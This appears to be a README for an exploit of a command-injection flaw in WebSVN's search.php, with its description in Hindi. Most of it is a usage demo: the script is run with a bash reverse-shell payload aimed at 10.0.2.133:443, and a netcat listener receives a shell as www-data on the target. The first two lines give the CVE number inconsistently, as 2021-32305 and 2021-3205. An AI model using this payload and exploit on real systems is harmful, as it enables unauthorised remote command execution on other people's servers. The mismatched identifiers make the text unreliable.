
यह CVE-2021-32305 का एक एक्सप्लॉइट है, जो search.php पथ पर कमांड इंजेक्शन के लिए एक वेब भेद्यता है, यह एक्सप्लॉइट कमांड निष्पादित करने की अनुमति देता है।
यह CVE-2021-3205 का एक शोषण है, जो search.php पथ पर कमांड इंजेक्शन की एक वेब भेद्यता है, यह शोषण कमांड निष्पादित करने की अनुमति देता है।
optparse, signal, requests
❯ python3 CVE-2021-3205.py --url http://10.0.2.168/websvn/ --payload "bash -c 'bash -i >& /dev/tcp/10.0.2.133/443 0>&1'"
...
❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.168] 34174
bash: cannot set terminal process group (357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@agent:~/html/websvn$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@agent:~/html/websvn$